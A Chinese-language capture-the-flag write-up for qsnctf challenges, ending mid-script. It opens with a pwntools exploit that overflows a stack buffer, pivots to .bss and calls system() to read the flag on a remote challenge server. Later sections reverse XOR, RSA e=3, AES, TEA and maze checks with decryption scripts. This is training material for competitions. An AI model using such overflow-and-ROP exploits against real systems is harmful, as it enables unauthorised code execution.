from pwn import *\nimport time\n\ncontext.log_level = 'debug'\ncontext.binary = elf = ELF('.\/pwn')\n\np = remote('challenge.qsnctf.com', 38901)\n\nbss_addr = elf.bss() + 0x600 \nif bss_addr % 0x10 != 0:\n    bss_addr = (bss_addr & ~0xF) + 0x10\n\nsystem_plt = elf.plt['system']\nleave_ret = ROP(elf).find_gadget(['leave', 'ret'])[0]\npivot_addr = 0x804aef5\n\np.recvuntil(b'5.Byen')\np.sendline(b'4')\np.recvuntil(b'What preparations have you made?n')\n\npayload1 = b'A' * 92\npayload1 += p32(bss_addr + 0x5c)\npayload1 += p32(pivot_addr)\npayload1 = payload1.ljust(104, b'x00')\n\np.send(payload1)\ntime.sleep(0.5)\n\ncmd_str = b'cat flag >&0x00'\n\npayload2 = p32(system_plt)\npayload2 += p32(0xDEADBEEF)\npayload2 += p32(bss_addr + 12)\npayload2 += cmd_str\npayload2 = payload2.ljust(92, b'x00')\npayload2 += p32(bss_addr - 4)\npayload2 += p32(leave_ret)\npayload2 = payload2.ljust(104, b'x00')\n\np.send(payload2)\n\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{67dcb68c911d4c8296b8820891802670}<\/code><\/pre>\n\n\n\n
Reverse<\/h1>\n\n\n\n
ezpy<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pyinstxtractor \u8fdb\u884c\u89e3\u5305<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pycdc.exe\u8fdb\u884c\u53cd\u7f16\u8bd1ezpy.pyc<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
# Source Generated with Decompyle++\n# File: ezpy.pyc (Python 3.8)\n\ndef check_flag(flag):\n    if not flag.startswith('flag{') or flag.endswith('}'):\n        return False\n    core = None[5:-1]\n    key = [\n        19,\n        55,\n        66,\n        102]\n    enc = []\n    for i, c in enumerate(core):\n        enc.append(ord(c) ^ key[i % len(key)])\n    target = [\n        118,\n        91,\n        53,\n        1,\n        117,\n        86,\n        48,\n        19]\n    return enc == target\n\ndef main():\n    user_input = input('Input your flag: ').strip()\n    if check_flag(user_input):\n        print('Correct! \ud83c\udf89')\n    else:\n        print('Wrong flag \u274c')\n\nif __name__ == '__main__':\n    main()\n<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n
\u622a\u53d6 flag{}\u4e2d\u95f4\u7684\u5b57\u7b26\u4e32\u3002\n\u5c06\u5b57\u7b26\u4e32\u4e0e key\u6570\u7ec4\u8fdb\u884c\u5faa\u73af\u5f02\u6216\u3002\n\u6bd4\u8f83\u7ed3\u679c\u662f\u5426\u7b49\u4e8e target \u6570\u7ec4\u3002<\/code><\/pre>\n\n\n\n
py\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
target = [118, 91, 53, 1, 117, 86, 48, 19]\nkey = [19, 55, 66, 102]\nflag_core = \"\"\n\nfor i, c in enumerate(target):\n    flag_core += chr(c ^ key[i % len(key)])\n\nprint(f\"flag{{{flag_core}}}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{elwgfaru}<\/code><\/pre>\n\n\n\n
EasyRSA\uff1f<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u67e5\u58f3\uff1a C# (.NET) \u7f16\u5199\uff0c\u65e0\u58f3\u3002,ILSpy\u6253\u5f00<\/p>\n\n\n\n
\u903b\u8f91\uff1a\u5728CheckMe.Form1\u7c7b\u4e2d\u627e\u5230button1_Click \u51fd\u6570\u3002<\/p>\n\n\n\n
\u4ee3\u7801\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n
\u83b7\u53d6\u8f93\u5165\u5b57\u7b26\u4e32\uff0cUTF-8 \u7f16\u7801\u5e76\u53cd\u8f6c\u5b57\u8282\u5e8f\uff08\u5bf9\u5e94 BigInteger \u7684\u5c0f\u7aef\u5e8f\u7279\u6027\uff0c\u5b9e\u9645\u7b49\u4e8e\u6784\u5efa\u4e86\u5927\u7aef\u5e8f\u6574\u6570\uff09\u3002\n\u8fdb\u884c RSA \u52a0\u5bc6\u8fd0\u7b97\uff1aBigInteger.ModPow(value, exponent, modulus)\u3002\n\u5c06\u7ed3\u679c\u4e0e\u786c\u7f16\u7801\u7684\u5bc6\u6587 text \u8fdb\u884c\u6bd4\u5bf9\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\/\/ CheckMe.Form1\nusing System;\nusing System.Numerics;\nusing System.Text;\nusing System.Windows.Forms;\n\nprivate void button1_Click(object sender, EventArgs e)\n{\n    if (string.IsNullOrWhiteSpace(textBox1.Text))\n    {\n        MessageBox.Show(\"\u6548\u9a8c\u503c\u4e0d\u80fd\u4e3a\u7a7a\", \"\u63d0\u793a\", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);\n        return;\n    }\n    try\n    {\n        byte[] bytes = Encoding.UTF8.GetBytes(textBox1.Text);\n        Array.Reverse(bytes);\n        byte[] array = new byte[bytes.Length + 1];\n        Array.Copy(bytes, array, bytes.Length);\n        array[array.Length - 1] = 0;\n        BigInteger value = new BigInteger(array);\n        BigInteger exponent = new BigInteger(3);\n        BigInteger modulus = BigInteger.Parse(\"139906397693819072650020069738596428398031056847078650722938421657851057538054976098647199375778966594569804403764522779998221022521589609634646037802060716905855507095146407052611429717736127575527226826221045673236950913759662383017581323909723145061976871530014985740162801140394142912236064962190443170959\");\n        BigInteger bigInteger = BigInteger.ModPow(value, exponent, modulus);\n        string text = \"2217344750798660611960824139035634065708739786485564450254905817930548259011086486194666552393884157042723116691899397246215979757440793411656175068361811329038472101976870023549368315569713807716791321322016687562917756728015984717774303119415642719966332933093697227475301\";\n        if (bigInteger.ToString() == text)\n        {\n            MessageBox.Show(\"\u9a8c\u8bc1\u6210\u529f\uff01Flag\u6b63\u786e\u3002\", \"\u6210\u529f\", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);\n        }\n        else\n        {\n            MessageBox.Show(\"\u9a8c\u8bc1\u5931\u8d25\uff0c\u8bf7\u91cd\u65b0\u8f93\u5165\u3002\", \"\u9519\u8bef\", MessageBoxButtons.OK, MessageBoxIcon.Hand);\n        }\n    }\n    catch (Exception ex)\n    {\n        MessageBox.Show(\"\u53d1\u751f\u9519\u8bef\uff1a\" + ex.Message, \"\u5f02\u5e38\");\n    }\n}\n<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e,\u4ee3\u7801\u4e2d\u7684\u52a0\u5bc6\u53c2\u6570\uff1a<\/p>\n\n\n\n
Modulus (N): \u975e\u5e38\u5927 (1024\u4f4d\u5de6\u53f3)\u3002\nExponent (e): 3\u3002\nCiphertext \u00a9: \u5df2\u77e5\u3002<\/code><\/pre>\n\n\n\n
RSA \u4f4e\u52a0\u5bc6\u6307\u6570\u653b\u51fb,\u7531\u4e8e e=3,e=3 \u6781\u5c0f\uff0c\u4e14\u660e\u6587\u957f\u5ea6\u6709\u9650\uff0c\u6781\u5927\u6982\u7387\u6ee1\u8db3 m3<nm3<n\u3002\u6b64\u65f6 RSA \u7684\u53d6\u6a21\u8fd0\u7b97\u672a\u751f\u6548\uff0c\u53ea\u9700\u5bf9\u5bc6\u6587 cc \u76f4\u63a5\u5f00\u4e09\u6b21\u6839\u53f7\u5373\u53ef\u8fd8\u539f\u660e\u6587\u3002<\/p>\n\n\n\n
py3\u4ee3\u7801\u5448\u73b0<\/p>\n\n\n\n
import gmpy2\nfrom Crypto.Util.number import long_to_bytes\n\ne = 3\nc = int(\"2217344750798660611960824139035634065708739786485564450254905817930548259011086486194666552393884157042723116691899397246215979757440793411656175068361811329038472101976870023549368315569713807716791321322016687562917756728015984717774303119415642719966332933093697227475301\")\n# N \u4e0d\u9700\u8981\u7528\u5230\uff0c\u56e0\u4e3a m^3 < N\n\n# 2\u76f4\u63a5\u5f00\u4e09\u6b21\u65b9\u6839\nm, exact = gmpy2.iroot(c, e)\n\nif exact:\n#Python \u76f4\u63a5\u8f6c\u5b57\u7b26\u5c31OK\u4e86\n    print(long_to_bytes(m).decode())\nelse:\n    print(\"\u89e3\u5bc6\u5931\u8d25\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{8a5e3e5eac499995bd10c17f8bc9c954}<\/code><\/pre>\n\n\n\n
AES\uff1f<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u548cRSA\u4e00\u6837\u5c31\u662f\u52a0\u5bc6\u6539\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e00\u6837\u7684\u7a0b\u5e8f\uff0c\u7528 ILSpy \u6253\u5f00\u76ee\u6807\u7a0b\u5e8f\u3002<\/p>\n\n\n\n
\u5b9a\u4f4d\uff1a\u5728 Form1 \u7c7b\u4e2d\u627e\u5230 button1_Click\u51fd\u6570\u3002\n\u903b\u8f91\uff1a\u7a0b\u5e8f\u83b7\u53d6\u7528\u6237\u8f93\u5165\uff0c\u8fdb\u884c AES \u52a0\u5bc6\uff0c\u5e76\u5c06\u52a0\u5bc6\u7ed3\u679c\u4e0e\u786c\u7f16\u7801\u7684 Base64 \u5b57\u7b26\u4e32\u8fdb\u884c\u6bd4\u5bf9\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53c2\u6570\u63d0\u53d6<\/p>\n\n\n\n
\u5206\u6790 C# \u4ee3\u7801\uff0c\u63d0AES \u89e3\u5bc6\u6240\u9700\u7684\u5173\u952e\u53c2\u6570\uff1a<\/p>\n\n\n\n
\u5bc6\u6587 \uff1a<\/p>\n\n\n\n
v6XOdOAcNjXvbD8NSHvRdr98ZSVzUvCY9Kdi8DU4DMZ+IFteVt2XpayB3jSDfOsf<\/code><\/pre>\n\n\n\n
 Base64\u7f16\u7801\n\u6a21\u5f0f Mode\uff1aAES \/ CBC \/ PKCS7 Padding\u3002\n\u5bc6\u94a5 Key\uff1a\n\u4ee3\u7801\u903b\u8f91\u4e3a\u5c06 q1s1c1t1f1 \u653e\u5165 16 \u5b57\u8282\u6570\u7ec4\u4e2d\u3002\n\u5b9e\u9645\u503c\uff1aq1s1c1t1f1 \u540e\u8865 6 \u4e2a 0x00\u3002\n\u504f\u79fb\u91cf IV\uff1a\n\u4ee3\u7801\u4e3a new byte[16]\uff0c\u9ed8\u8ba4\u4e3a\u5168 0x00\u3002<\/code><\/pre>\n\n\n\n
py3\u4ee3\u7801\u5448\u73b0<\/p>\n\n\n\n
from Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nimport base64\n\ncipher_text = base64.b64decode(\"v6XOdOAcNjXvbD8NSHvRdr98ZSVzUvCY9Kdi8DU4DMZ+IFteVt2XpayB3jSDfOsf\")\nkey = b\"q1s1c1t1f1\".ljust(16, b'x00')  # \u8865\u9f50\u523016\u5b57\u8282\niv = b'x00' * 16                          # \u51680 IV\n\n# 2. AES \u89e3\u5bc6\ntry:\n    aes = AES.new(key, AES.MODE_CBC, iv)\n    decrypted = unpad(aes.decrypt(cipher_text), AES.block_size)\n    print(\"Flag:\", decrypted.decode('utf-8'))\nexcept Exception as e:\n    print(\"Error:\", e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{4f7786120450144791741bd082bfdb58}<\/code><\/pre>\n\n\n\n
CheckME<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
RSA \u9006\u5411\u9898\u76ee\u662f\u5c0f\u516c\u94a5\u6307\u6570\u653b\u51fb\u7684\u53d8\u79cd<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import sys\n\nn = 139906397693819072650020069738596428398031056847078650722938421657851057538054976098647199375778966594569804403764522779998221022521589609634646037802060716905855507095146407052611429717736127575527226826221045673236950913759662383017581323909723145061976871530014985740162801140394142912236064962190443170959\nc = 2217344750798660611960824139035634065708739786485564450254905817930548259011086486194666552393884157042723116691899397246215979757440793411656175068361811329038472101976870023549368315569713807716791321322016687562917756728015984717774303119415642719966332933093697227475301\n\ndef solve():\n    k = 0\n    while True:\n        target = k * n + c\n        low = 0\n        high = target\n        found = False\n        m = 0\n\n        while low <= high:\n            mid = (low + high) \/\/ 2\n            cube = mid * mid * mid\n            if cube == target:\n                found = True\n                m = mid\n                break\n            elif cube < target:\n                low = mid + 1\n            else:\n                high = mid - 1\n\n        if found:\n            try:\n                flag = m.to_bytes((m.bit_length() + 7) \/\/ 8, 'big').decode()\n                print(flag)\n                break\n            except:\n                pass\n        k += 1\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{8a5e3e5eac499995bd10c17f8bc9c954}<\/code><\/pre>\n\n\n\n
muffin_cake<\/h2>\n\n\n\n
\u52a0\u5bc6\u4e3b\u8981\u5728sub_140003F40<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u903b\u8f91<\/p>\n\n\n\n
\u8f93\u5165\u5b57\u7b26\u5148\u5f02\u6216 0x66\uff0c\u7136\u540e\u51cf\u53bb 120\uff08\u53d1\u751f8\u4f4d\u65e0\u7b26\u53f7\u6574\u6570\u6ea2\u51fa\u622a\u65ad\uff09\uff0c\u6700\u7ec8\u7ed3\u679c\u4e0e\u786c\u7f16\u7801\u6570\u7ec4 v6 \u8fdb\u884c\u9010\u5b57\u8282\u6bd4\u5bf9\u3002\n\u516c\u5f0f\uff1acipher = (plain ^ 0x66) - 120<\/code><\/pre>\n\n\n\n
\u89e3\u9898<\/p>\n\n\n\n
\u5b9a\u4f4d\u5230 sub_140003F40 \u7684 for \u5faa\u73af\uff08\u6b21\u6570\u4e3a37\uff09\u3002\n\u63d0\u53d6\u51fa\u6808\u4e2d\u8d4b\u503c\u7684 37 \u5b57\u8282\u5bc6\u6587\u6570\u7ec4 v6\u3002\n\u6839\u636e\u52a0\u5bc6\u516c\u5f0f\u9006\u63a8\uff1a\u5c06\u5bc6\u6587\u52a0 120\uff0c\u5728 Python \u4e2d\u6309 & 0xFF \u6a21\u62df uint8 \u6ea2\u51fa\uff0c\u518d\u5f02\u6216 0x66 \u5373\u53ef\u8fd8\u539f\u660e\u6587\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
v6 = [-97, -99, -112, -115, -102, -120, -91, -105, -37, -80, -39, -63, -77, -101, -88, -120, -33, -112, -63, -83, -81, -107, -35, -63, -118, -85, -110, -33, -115, -33, -34, -69, -37, -31, -31, -31, -93]\nflag = \"\".join([chr(((c + 120) & 0xFF) ^ 0x66) for c in v6])\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{i5N7_MuFf1n_CAk3_dEl1c10U5???}<\/code><\/pre>\n\n\n\n
oi_feelings<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
32×32 \u8ff7\u5bab,\u52a8\u6001\u89c4\u5212DP \/ TLS\u53cd\u8c03\u8bd5\u4e0e\u6570\u636e\u52a0\u5bc6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
TlsCallback_0 \u6570\u636e\u521d\u59cb\u5316\/\u89e3\u5bc6\n\u5728main\u51fd\u6570\u8fd0\u884c\u524d\u6267\u884c\uff0c\u5bf9 dword_140029000 \u6570\u7ec4\u7684\u524d3\u4e2a\u5143\u7d20\u5faa\u73af\u5f02\u6216 9\uff0c\u5bf9 dword_140029010 \u6570\u7ec4\uff0832x32\u7684\u8ff7\u5bab\u5730\u56fe\uff09\u5faa\u73af\u5f02\u6216 0x123\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
main (\u8f93\u5165\u9a8c\u8bc1)\n\u6821\u9a8cflag\u957f\u5ea6\u4e3a70\uff0c\u683c\u5f0f\u4e3a qsnctf{...}\u3002\u4e2d\u95f4\u768462\u4e2a\u5b57\u7b26\u5fc5\u987b\u662f\u89e3\u5bc6\u540e\u7684\u5b57\u7b26 '1' \u548c '2'\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
sub_1400010B0 (\u8ff7\u5bab\u903b\u8f91)\n\u8ff7\u5bab\u8d77\u70b9(0,0)\uff0c\u9650\u5236\u8d7062\u6b65\u3002\u5b57\u7b26 '1' \u4ee3\u8868x+1\uff08\u5411\u53f3\uff09\uff0c\u5b57\u7b26 '2' \u4ee3\u8868y+1\uff08\u5411\u4e0b\uff09\u3002\u8981\u6c42\u8d70\u5230(31,31)\u7ec8\u70b9\u65f6\uff0c\u8def\u5f84\u4e0a\u6240\u6709\u683c\u5b50\u7684\u6743\u503c\u7d2f\u52a0\u548c\u7b49\u4e8e\u89e3\u5bc6\u540e\u7684\u76ee\u6807\u503c 0xb7e5 (47077)\u3002<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u8def\u5f84\u6c42\u548c\u95ee\u9898\u3002\u5148\u4ecePE\u6587\u4ef6\u4e2d\u76f4\u63a5\u63d0\u53d6\u51fa .data \u6bb5\u7684\u8ff7\u5bab\u6570\u7ec4\u548c\u6821\u9a8c\u6570\u636e\uff0c\u5206\u522b\u5f02\u6216\u8fd8\u539f\u3002\u7136\u540e\u4f7f\u7528\u52a8\u6001\u89c4\u5212\uff08DP\uff09\u904d\u5386 32x32 \u5730\u56fe\uff0c\u8bb0\u5f55\u5230\u8fbe\u6bcf\u4e2a\u683c\u5b50\u53ef\u80fd\u4ea7\u751f\u7684\u6240\u6709\u8def\u5f84\u6743\u503c\u548c\u5bf9\u5e94\u7684\u64cd\u4f5c\u5b57\u7b26\uff0c\u6700\u540e\u5728\u7ec8\u70b9\u5b57\u5178\u4e2d\u5339\u914d\u76ee\u6807\u503c 0xb7e5 \u5373\u53ef\u62ff\u5230\u5185\u90e8flag<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\n\ndef get_pe_data(path, rva, size):\n    with open(path, 'rb') as f:\n        f.seek(0x3C)\n        pe = struct.unpack('<I', f.read(4))[0]\n        f.seek(pe)\n        if f.read(4) != b'PEx00x00': return None\n        f.seek(pe + 6)\n        secs = struct.unpack('<H', f.read(2))[0]\n        f.seek(pe + 20)\n        optsz = struct.unpack('<H', f.read(2))[0]\n        f.seek(pe + 24 + optsz)\n        for _ in range(secs):\n            hdr = f.read(40)\n            vaddr = struct.unpack('<I', hdr[12:16])[0]\n            vsize = struct.unpack('<I', hdr[8:12])[0]\n            rptr = struct.unpack('<I', hdr[20:24])[0]\n            if vaddr <= rva < vaddr + vsize:\n                f.seek(rptr + (rva - vaddr))\n                return f.read(size)\n    return None\n\ndef solve():\n    exe = 'oi_feelings.exe'\n    dwords = struct.unpack('<3I', get_pe_data(exe, 0x29000, 12))\n    maze = struct.unpack('<1024I', get_pe_data(exe, 0x29010, 4096))\n\n    c0 = chr((dwords[0] ^ 9) & 0xFF)\n    c1 = chr((dwords[1] ^ 9) & 0xFF)\n    target = (dwords[2] ^ 9) & 0xFFFFFFFF\n\n    grid = [[(maze[i*32+j] ^ 0x123) & 0xFFFFFFFF for j in range(32)] for i in range(32)]\n    dp = [[{} for _ in range(32)] for _ in range(32)]\n    dp[0][0][grid[0][0]] = \"\"\n\n    for y in range(32):\n        for x in range(32):\n            if x == 0 and y == 0: continue\n            cur = dp[y][x]\n            if x > 0:\n                for s, p in dp[y][x-1].items():\n                    cur[(s + grid[y][x]) & 0xFFFFFFFF] = p + c0\n            if y > 0:\n                for s, p in dp[y-1][x].items():\n                    cur[(s + grid[y][x]) & 0xFFFFFFFF] = p + c1\n\n    flag = dp[31][31].get(target, \"\")\n    print(f\"qsnctf{{{flag}}}\")\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{21112122121122222221222221122111211111222112211112111222122111}<\/code><\/pre>\n\n\n\n
except_exper<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770bTlsCallback_0\u80fd\u770b\u5230\u660e\u663e\u7684\u53cd\u8c03\u8bd5\u903b\u8f91\u3002\u8f93\u5165\u5904\u7406\u90e8\u5206\u5728sub_4017E0\uff0c\u7a0b\u5e8f\u628a\u6211\u4eec\u8f93\u5165\u7684flag\u6328\u4e2a\u548c102\u8fdb\u884c\u4e86\u5f02\u6216\u64cd\u4f5c\u3002\u987a\u7740\u5f80\u4e0b\u770bsub_401670\uff0c\u51fd\u6570\u5f00\u5934\u76f4\u63a5\u629b\u51fa\u4e86\u4e00\u4e2aC++\u5f02\u5e38\uff0c\u8fd9\u5c31\u5bfc\u81f4\u4e0b\u9762\u7d27\u8ddf\u768432\u8f6eTEA\u5faa\u73af\u4ee3\u7801\u6839\u672c\u4e0d\u4f1a\u53bb\u6267\u884c\uff0c\u4f30\u8ba1\u662f\u51fa\u9898\u4eba\u653e\u5728\u8fd9\u7684\u5047\u7684\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u987a\u7740\u5f02\u5e38\u5904\u7406\u673a\u5236\u627e\u771f\u5b9e\u7684\u63a7\u5236\u6d41\uff0csub_4015D0\u91cc\u6ce8\u518c\u4e86\u4e00\u4e2a\u540d\u53ebHandler\u7684VEH\u51fd\u6570\uff0c\u91cc\u9762\u6709\u4e00\u6bb516\u8f6e\u7684TEA\u53d8\u79cd\u52a0\u5bc6\u903b\u8f91\uff0c\u4f46\u662f\u5b83\u7ed3\u5c3e\u8fd4\u56de\u4e860\uff0c\u610f\u601d\u662f\u5f02\u5e38\u6ca1\u5904\u7406\u5b8c\u63a5\u7740\u5f80\u4e0b\u4f20\u3002\u5f80\u4e0b\u627e\u5230\u5168\u5c40\u672a\u5904\u7406\u5f02\u5e38\u8fc7\u6ee4\u51fd\u6570TopLevelExceptionFilter\uff0c\u53d1\u73b0\u91cc\u9762\u53c8\u63a5\u529b\u4e86\u52a0\u5bc6\u903b\u8f91\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u56e0\u4e3a\u5f02\u5e38\u6d41\u6765\u56de\u6a2a\u8df3\uff0c\u5bfc\u81f4\u5168\u5c40\u53d8\u91cfsum\u7684\u503c\u548c\u5b9e\u9645\u8dd1\u7684\u8f6e\u6570\u5728\u9759\u6001\u5206\u6790\u65f6\u6781\u5bb9\u6613\u7b97\u9519\uff0c\u6240\u4ee5\u76f4\u63a5\u63d0\u5185\u5b58\u5bc6\u6587\uff0c\u5229\u7528\u5df2\u77e5\u660e\u6587\u5934\u7ed3\u5408\u811a\u672c\u7206\u7834\u3002\u8dd1\u51fa\u6765\u8bc1\u5b9e\u5e95\u5c42\u771f\u5b9e\u8dd1\u4e8664\u8f6e\uff0c\u521d\u59cbsum\u4e3a0xcdf03780\uff0c\u7167\u7740\u72b6\u6001\u76f4\u63a5\u5199\u89e3\u5bc6<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
v4_signed = [114, 56, -44, -124, 112, 4, -109, 94, -76, -6, -99, 33, 59, -29, 110, -53, -105, 59, -95, -82, -59, 81, 128, 37, -72, 43, -39, 13, -41, -56, -20, 3, -25, 62, -39, -39, 57, -122, 26, 2, -76, 87, -109, -111, -46, -41, -7, -39]\nv4_bytes = bytes([x & 0xFF for x in v4_signed])\nDELTA = 322420958\nflag = bytearray()\n\nfor i in range(0, 48, 8):\n    L = int.from_bytes(v4_bytes[i:i+4], 'little')\n    R = int.from_bytes(v4_bytes[i+4:i+8], 'little')\n    s = 0xcdf03780\n\n    for j in range(64):\n        R = (R - (((L >> 4) + 44) ^ (s + L) ^ ((L << 5) + 33))) & 0xFFFFFFFF\n        L = (L - (((R >> 4) + 22) ^ (s + R) ^ ((R << 5) + 11))) & 0xFFFFFFFF\n        s = (s - DELTA) & 0xFFFFFFFF\n\n    L ^= 0x66666666\n    R ^= 0x66666666\n    flag.extend(L.to_bytes(4, 'little'))\n    flag.extend(R.to_bytes(4, 'little'))\n\nprint(flag.decode('utf-8', 'ignore'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{Th3_w1Nd0wS_cPP_Exc3P710N_1S_s0oO_FuN!!!}<\/code><\/pre>\n\n\n\n
ez_re<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u5728 0x4012A4 \u9644\u8fd1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u4f2a\u4ee3\u7801\u89e3\u6790\u9519\u8bef \u585e\u4e86\u5927\u91cf cmp + jnb\u7684\u8df3\u8f6c\uff0c\u7d27\u63a5\u7740\u8ddf\u4e0a FF FF\u8fd9\u79cd\u5783\u573e\u5b57\u8282\uff0cIDA \u7684\u53cd\u6c47\u7f16\u987a\u7740\u8bfb\u4e0b\u53bb\u76f4\u63a5\u5c31\u8dd1\u504f\u4e86\n\u52a0\u5bc6\u903b\u8f91\u5728 0x4012B3\u5230 0x401F8C\u6709\u82b1\u6307\u4ee4\n\u770b\u6c47\u7f16\u5783\u573e\u5b57\u8282\u53f3\u952e\u6253\u8865\u4e01\u5168\u6539\u6210 90 \u5c31\u662fnop \u6216\u8005\u76f4\u63a5\u9009\u62e9\u8fd9\u4e2a\u533a\u95f4\u76f4\u63a5\u6309C\u5f3a\u5236\u8f6c\u6362\u4ee3\u7801\u5c31\u884c<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u94a5sierting_solarsec_qsnctf_chal_1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
IV<\/p>\n\n\n\n
0x424000 \"sierting_solarsec_qsnctf_chal_1\"\uff0c\u76f4\u63a5\u4ece\u7b2c 16 \u4e2a\u5b57\u8282\u5904\u5207\u5f00\uff01\n\u8df3\u8fc7\u524d\u9762\u7684 sierting_solarse \u540e\uff0c\u4ece 0x424010 \u8fd9\u4e2a\u5730\u5740\u5f00\u59cb\u5f80\u540e\u6570 16 \u4e2a\u5b57\u8282\uff0c\u662f\uff1a c_qsnctf_chal_1x00 \uff08\u6700\u540e\u5e26\u4e00\u4e2a\u9690\u5f62\u7684\u5b57\u7b26\u4e32\u7ed3\u5c3e\u6807\u5fd7 `x00`\uff0c\u51d1\u9f50 16 \u5b57\u8282\uff09\nCBC\u6a21\u5f0f\u7684IV<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u9b54\u6539\u70b9\u5728\u4e8e\u628a\u5217\u6df7\u6dc6\u77e9\u9635\u7684\u4f20\u53c2\u5f3a\u884c\u6539\u6210\u4e86 7, 2, 5, 1\u3002\n\u89e3\u5bc6\u5199\u4e2a\u9ad8\u65af\u6d88\u5143\uff0c\u5728\u6709\u9650\u57df GF(2^8) \u4e0b\u628a\u8fd9\u5957\u9b54\u6539\u77e9\u9635\u7684\u9006\u77e9\u9635\u7b97\u51fa\u6765\u3002\u66ff\u6362\u6389\u6807\u51c6AES\u7684\u9006\u5411\u5217\u6df7\u6dc6\u77e9\u9635\uff0c\u6309AES-192\u89e3\u5bc6\u8dd1\u5b8c\u5355\u5757\u540e\uff0c\u518d\u8ddf\u524d\u4e00\u5757\u7684\u5bc6\u6587\uff08\u6216IV\uff09\u505a\u5f02\u6216\uff0c\u7136\u540e\u5c31\u884c\u4e86\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
def gf_mul(a, b):\n    p = 0\n    for i in range(8):\n        if b & 1: p ^= a\n        a = (a << 1) ^ 0x11B if (a & 0x80) else (a << 1)\n        b >>= 1\n    return p & 0xFF\n\ndef gf_inv(a):\n    for i in range(1, 256):\n        if gf_mul(a, i) == 1: return i\n    return 0\n\ndef inv_mat(M):\n    n = len(M)\n    A = [row[:] + [1 if i == j else 0 for j in range(n)] for i, row in enumerate(M)]\n    for i in range(n):\n        if A[i][i] == 0:\n            for j in range(i+1, n):\n                if A[j][i] != 0:\n                    A[i], A[j] = A[j], A[i]\n                    break\n        inv_p = gf_inv(A[i][i])\n        for j in range(2*n):\n            A[i][j] = gf_mul(A[i][j], inv_p)\n        for j in range(n):\n            if i != j:\n                f = A[j][i]\n                for k in range(2*n):\n                    A[j][k] ^= gf_mul(A[i][k], f)\n    return [row[n:] for row in A]\n\nSBOX = [\n    0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,\n    0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,\n    0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,\n    0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,\n    